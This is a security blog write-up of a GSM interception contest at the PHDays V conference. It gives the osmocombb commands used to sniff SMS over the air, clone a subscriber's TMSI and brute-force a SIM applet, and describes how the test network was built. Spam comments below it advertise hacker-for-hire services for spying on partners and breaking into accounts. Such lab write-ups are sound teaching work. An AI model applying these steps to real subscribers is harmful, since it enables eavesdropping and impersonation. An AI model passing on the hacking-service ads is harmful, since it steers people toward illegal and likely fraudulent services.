How much does it take to hack a mobile network?
Is electronic government secure
in the era of WikiLeaks and Anonymous?

Is SCADA hacking a Hollywood fiction
or the nowadays reality?
Internet banking: is there any chance to win
over the fraudsters?

Cyber-crimes, cyber-espionage, cyber-war: where do we draw a borderline?


Friday, July 3, 2015

The MiTM Mobile Contest: GSM Network Down at PHDays V

Although we have published several research works on cell phone tapping, SMS interception, subscriber tracking, and SIM card cracking, lots of our readers still regard those stories as some kind of magic used only by intelligence agencies. The MiTM Mobile contest was held at PHDays for the first time, and it let the participants realize how easily an attacker can conduct the above-mentioned attacks having only a 10$ cell phone with some hacker freeware.

Contest conditions and technologies
You've got a corporate cell phone of a MiTM Mobile network user.
Through the DarkNet you have obtained some information that can be useful:
1) The codes for publes (PHDays game currency – Pseudo rUBLE) are regularly sent to the phone number of the corporation's chief accountant — 10000. 
2) The financial director is missing, nobody can get him on the phone for several days, his cell phone is turned off, but he is still getting passwords. 
3) You can obtain key information by calling the number 2000, but there is authorization by the caller's number. We also managed to find out the phone number of the director's private secretary — 77777. He must have the access. 
There are other numbers in the network through which some employees get important information, but, unfortunately, we failed to find them. Besides, don't forget — you can always come across someone's private information in the corporate network.
The CTF participants got about the same intro at the MiTM Mobile contest held at PHDays V.

We deployed a real mobile operator infrastructure for the contest. It included a base station, cell phones, landline phones, and SIM cards. The name of the contest — MiTM Mobile — was picked for a reason: we wanted to emphasize the vulnerability of our network. For the logo, we chose the Kraken (well, kind of) destroying a cell tower.

So, it's all clear with the operator's trappings, let's now look at the network implementation. Our hardware solution was a device with a simple name — UmTRX (the manufacturer's site: The network's wireless part was based on this unit. The functionality of the base station and GSM (software part) was implemented through the Osmocom/OpenBTS stack.

UmTRX is the heart of MiTM Mobile.

We also ordered SIM cards for a simple and quick network registration. The MiTM Mobile network credentials were specified in them, and the card data were registered in the network. In order to simplify air tapping and make the life of the players easier we disabled data encryption in our network (A5/0). Apart from the SIM cards, the participants were provided with Motorola C118 cell phones and USB-UART cables (CP2102). All this, including the osmocombb stack, allowed the participants to tap the air, intercept SMS messages intended for other users, and make phone calls in the network on the part of another user.

Each team got a SIM card, cable, cell phone, and virtual machine image with the osmocombb stack build to experiment with.

Review of Tasks

Some theory at first:

  • IMSI — International Mobile Subscriber Identity stored in SIM-card. 
  • MSISDN — Mobile subscriber ISDN number phone number, assigned to IMSI in operator’s infrastructure
  • TMSI — Temporary Mobile Subscriber Identity randomly assigned by the network to every mobile in the area, the moment it is switched on.

IMSI is the magic number specified in the SIM card. It looks something like this — 250-01-ХХХХХХХХХХ, where 250 is the country code (Russia), 01 is the operator code (MTS), and ХХХХХХХХХХ is a unique ID. A subscriber is identified and authorized in the operator's network by the IMSI.

In this case, we have the sysmocim SIM card with 901 country code, 70 operator code, and 0000005625 subscriber's ID in the operator's network (see fig.).

The second thing you need to remember: the MSISDN, your cell phone number (for example, +79171234567), is stored in the operator's base, and not on the SIM card. During the call, the base station puts this number according to the IMSI <--> MSISDN conversion table (MSC/VLR has this function in the real network). Or it doesn't (in case of an anonymous call).

TMSI is a 4-byte temporary identifier given to the subscriber after the authorization.

Now that we know this, let's continue.

We need to run the osmocombb stack. The actions are quite simple. You need to connect the cable to the computer and forward it inside the virtual machine. A device named /dev/ttyUSB0 should appear there. After that, you should connect a TURNED-OFF cell phone to the cable through an audio jack.

Then you open two consoles. In the first one, you must run the following command:

#~/osmocom-bb-master/src/host/osmocon/osmocon  -p /dev/ttyUSB0  -m c123xor  -c ~/osmocom-bb-master/src/target/firmware/board/compal_e88/layer1.highram.bin

Now press the red button of the cell phone to turn it on. This command starts uploading firmware into the phone and opening the socket that will be a mediator between the phone and the programs. It is the so-called layer 1 of the OSI model. It establishes physical interaction with the network.

This is roughly what layer1 outputs to the console after it has been uploaded into the phone (this is not something of interest, though).

In the second console, you must run the following command:

#~/osmocom-bb-sylvain/src/host/layer23/src/misc/ccch_scan  -a 774  -i

This command establishes layer 2-3 of the OSI model, namely — air tapping in search of CCCH (Common Control Channel) packages.

774 is ARFCN we broadcast at. Yea, nobody needs to look for the channel of our operator. We did everything we could to make your life easier, our dear participants :)

-i is the interface you will send the packages to.

Now, you launch Wireshark. It will do everything for you — for instance, it will gather all the necessary packages in SMS, unparce the TPDU/PDU format, and show everything easy to read.

Remember, you were to intercept SMS for the first task. In order to make browsing in Wireshark more convenient and keep our screen "clean", you should set the filter at gsm_sms packages.

Now you can see SMS messages on the air. Congrats, you've completed the first task! If you were now at PHDays V, you would be able to see the SMS message containing the code for getting publes. The code was being aired constantly during the two days, every five minutes, an even at night.

You must run layer1 again for the second task (or you can just keep it on after the previous one).

In the second console, you run the following command as layer2-3:

#~/osmocom-bb-master/src/host/layer23/src/mobile/mobile -i

Nothing really hard here. The mobile application can function as a virtual cell phone. In order to get access to these functions, you must open the third console and run

$ telnet 4247

A Cisco-like interface will open. You must enable the extended mode:

OsmocomBB> enable

After that, you should display the list of commands available:

OsmocomBB# list

What do you think the clone command does? Well, its name speaks for itself – you can clone a subscriber. In the description of the command, you can see it accepts TMSI as an argument. If you manage to find out the victim's TMSI and put in our phone, you will be able to connect to the network instead of the initial subscriber.

During the whole conference, we were trying to send an SMS message to a phone number missing in the network. IF a participant would put the TMSI requested by the base station as the clone command parameter, he or she would get the flag with the code for money.

OsmocomBB# clone 1 5cce0f7f

It was quite easy to see the base station request to the subscriber. You could look for gsmtap packages in Wireshark with the Paging Requests Type 1 request (the request the base station makes when a call is originated).

Alternatively, you could use the second console that has mobile launched:

After you type the TMSI, you will get an SMS message intended for the initial subscriber.

Now you have enough information for the third task. Here, you have to pretend to be another subscriber as in the previous task. You know his number, but not TMSI. What can you do? It's easy: you just have to send an SMS message to the subscriber or call him to the number 77777. You will see the base station requests to the 77777 subscriber as in the last example. Note: you must use another cell phone for the call or SMS; otherwise, your Motorola won't see the base station's broadcast requests intended for the target subscriber.

After that, you need to put the TMSi into your phone by means of the clone command and make a call to the precious number!

OsmocomBB# call 1 2000

Now you take Motorola and listen to the code. If the participants have done everything right, they will hear it, otherwise — a joke will be the sole thing they get :)

Additionally, there were SMS messages in the network that informed about a new voice message received. If the participants hadn't been lazy and had opened the phone book of the device, they would have seen the number of the voice mail. If you call this number, you can hear insider information — data about increase and decrease in the rate of MiTM Mobile shares.

The fourth task was connected not quite with GSM, but with vulnerable SIM cards used for getting access to the network. Apart from the phone, each team got a SIM card with a pre-installed application showing a greeting — "Welcome to PHDays V". Lukas Kuzmiak and Karsten Nohl created a utility called SIMTester for searching vulnerable applets. Its key feature is the ability to work through osmocom cell phones. So, you need to plug the SIM card into the phone, connect it to your computer and start the search. After a couple of minutes, you can analyze the data obtained:

Apart from lots of apps disclosing information enough for key brute forcing, you've been provided with a "red" application, which doesn't demand any secret keys for accessing. Let's analyse it separately:

The last two bytes of the SIM card reply are the status bytes, where, for instance, 0x9000 means that the command has been completed successfully. In this case, you get 0x9124, which means there are 36 bytes the card wants to return to us. Let's change the program code a little and see, what kind of data it is.

After decoding, you will get:

>>> ‘D0228103012100820281028D1704596F752061726520636C6F73652C2062616420434C419000'.decode('hex')
'\xd0"\x81\x03\x01!\x00\x82\x02\x81\x02\x8d\x17\x04You are close, bad CLA\x90\x00'

You need to brute force all the possible CLAs and INSs for the instructions sent in the binary SMS message — and you will get the flag:

>>> 'D0378103012100820281028D2C04596F757220666C61673A2035306634323865623762623163313234323231383333366435306133376239659000'.decode('hex')
'\xd07\x81\x03\x01!\x00\x82\x02\x81\x02\x8d,\x04Your flag: 50f428eb7bb1c1242218336d50a37b9e\x90\x00'

That's it, as far as the tasks are concerned.

Contest winners and surprises

All the PHDays participants could try hand at the MiTM Mobile contest together with the CTF teams: those who wished to take part were provided with all the necessary equipment and a virtual machine. Overall, there were more than ten participants on top of the CTF teams.

However, the only one who managed to intercept the SMS message in the middle of the first day was Gleb Cherbov, who ultimately became the contest winner.

Only the More Smoked Leet Chicken team managed to complete three tasks by the beginning of the second day. The fourth task was available only for the CTF participants, but everybody failed it.

The forum visitors could notice that LTE and 3G were missing occasionally, and sometimes the network was not available if you come close to the zone with the GSM jammers that looked like this:

Some people were getting messages from the number 74957440144 (or from an anonymous one) with the text "SMS_from_bank" or some other "harmless spam". It was connected with the operation of the MiTm Mobile network.

Also, some "luckers" got the following message by the end of the second day:

This joke has nothing to do with MiTM Mobile functioning, but it reminds everyone once again of general safety rules. Watch out for your pet phone, which suddenly starts finding the MosMetro_Free network (free WiFi network in Moscow underground) in a place where it shouldn't be, connects to it, and lots of programs get loose into a trap. Some of them use the phone number as an identifier. The attacker can get this number and then sends the messages out through the SMS gateway to all the "luckers".

P.S. Here are the details about the network components for all those who would like to make a contest similar to our MitM Mobile.

The UmTRX itself is an SDR (Software Defined Radio), i.e. "just a radio". All the manuals concerning the configuration can be found at or You may also use a ready-made solution from UmTRX — UmDESK, it has everything pre-installed. All you need is to fill in the configuration files according to the manual and start broadcasting.

You can find an image of the osmocombb stack here (we highly recommend you to have VMWare 11). This build is enough for experimenting. SIM cards are not necessary, but you have to get a cell phone and any USB-UART cable.

You could choose any cell phone from the list:

And, yes, you can find PL2303 and FT232 almost everywhere. Unsoldering a 2.5 mini-jack is piece of cake.

You can order SIM cards and the cable here:

Such as
USB-UART (CP2102):
SIM cards:

You can find cell phones on Ebay, buy in pedestrian underpasses, or order in China: on average, you will spend 10$ per phone.

We want to express special gratitude to the guys from Fairwaves (they are the ones who make UmTRX, UmDESK, UmROCKET, and etc.) for consulting and the equipment provided for testing. They do a GREAT thing! And also, special thanks to Ivan.


  1. Really good post.It is just what I was looking for and quite thorough as well. Thanks for posting this, I saw a couple other similar posts
    but yours was the best so far. The ideas are strongly pointed out and clearly emphasized. Best essay writing service

  2. Conducting the mobile contests like MiTM Mobile Contest is good. This will be a good platform to the customers to buy the most modern mobile phones and also easier way to find the upcoming phone models also and also the latest brands too- research paper writing service

  3. The MITM mobile contest will be a best platform to update latest news about the mobiles and also new mobile technologies. We all know the influence of mobile in our daily life, so lose the opportunity. thesis writing service reviews

  4. An experienced hacker can easily do cell phone tracking, SIM card tracking etc. Ordinary people have no great idea about the tricks used in hacking and they don't even think about these kinds of activities. This MiTM mobile contest is like an awareness program for people who have no idea about hacking. Custom essay writing service

  5. The MiTM mobile contest is really fabulous so that people who are not aware of hacking can easily know about this in detail. Only experienced people could do this since they have deeper knowledge in this area. dissertation writing service reviews

  6. I recommend you look at this site, if you have problems with your essay writing -

    1. If you need to hire a real hacker to help spy on your partner's cell phone remotely, change your grades or boost your credit score. Contact this helpline 347.857.7580 or the email address

  7. The MITM mobile contest will be a best platform to update latest news about the mobiles and also new mobile technologies
    Send Flowers To Japan

  8. I strongly recommend the service of a GREAT Hacker to you and his email is I have used him quite a number of times and he has never disappointed me.

    He does all types of mobile hacks, get unrestricted and unnoticeable access to your partner/spouse, Skype, Facebook Account, Email(s), Whatsapp, Instagram, Text messages, Twitter, Bank accounts, office files etc.

    Getting the job done is as simple as sending an email to stating what you want to do.

  9. Hello,be warned, most of these so called hackers here are impostors, I know how real hackers work, they never advertise themselves in such a credulous manner and they are always discrete. I’ve been ripped off so many times out of desperation trying to find urgent help until my friend finally introduced me to a reliable hacker who works with Proof, discretion and delivers, he does all sorts of hacks but he helped me hack my cheating boyfriend email/facebook,I have made him my permanent hacker and you can as well enjoy his services. You can contact him at mitchbourne (@) cyberservices . com and after his work also endeavor to spread the good news on his work and how he helped you, Just tell him Miss Kniffen referred you.

  10. If you are good at hacking you can easily back any mobile phone but we cannot easily use SIM card cracking. In our county there many legal procedures…

  11. Wow! This is real good site for the readers as the content in this sites is very informative and it makes us pleasure to read the whole content. Gifts To Pakistan

  12. I wonder what is the oldest gadget in this pile?

  13. Interesting post! This is really helpful for me. I like it! Thanks for sharing!
    dissertation Writing Service

  14. It is for the first that I just visited your site and I find it really interesting! Congratulations! Custom Essay Writing Service

  15. Thanks on your marvelous posting! I quite enjoyed reading it, you can be a great author. I will be sure to bookmark your blog and will often come. Write My Essays

  16. Get Online Assignment Help SG Service in Singapore at cheapest price by expert writers of Students Assignment help. Even students can get highly marks in their exam because we provide you quality assignment that will 100% help you to increase your academic performance.


  17. I was introduced to SPYNETPROFESSONALHACKERS@GMAIL.COM because i really wanted to know what my husband has been up to lately as
    I seem not to be getting his attention.He was able to hack into my husband’s Facebook, Snapchat, WhatsApp, Instagram and
    above all gave me full access to his
    mobile phone remotely and emails. I couldn't help but to introduce him to those who
    have their spouse cheating on them and want to spy on them- SPYNETPROFESSONALHACKERS@GMAIL.COM ...
    I’m very sure he will help you out with any hack related issues, tell him I referred you..thank me later

  18. Your sharing of this content is very interesting. I like it very much. Hopefully I will be able to read more post from you. How to Write A+ Essays

  19. Hello everyone, was interesting to read your article. Usually i'm reading New York Times , but now i will read you too! (

  20. * Level Seven Hacker Group *
    We are a group of experienced WHITE HAT HACKERS. We do all types of hacking like
    - Keylogger
    - Denial of Service (DoS\DDoS)
    - Waterhole attacks
    - Fake WAP
    - Eavesdropping (Passive Attacks)
    - Phishing
    - Virus, Trojan etc.
    - ClickJacking Attacks
    - Cookie theft
    - Bait and switch
    - any email
    - phone spy
    - network sniffing
    - database hacking
    - change of grades (for any school)
    - Clear criminal records
    - any social media account
    - Android hack
    - iOS hack
    - credit score hack
    - Retrieval of lost documents
    - Hack into companies
    - Hack CCTV
    - DUIs
    and many more.
    Contact us at
    Phone Number & Whatsapp +1(732) 639-1527

    for any of your hacking needs. Come to us with your problem and we will help you solve them in less than 3 days.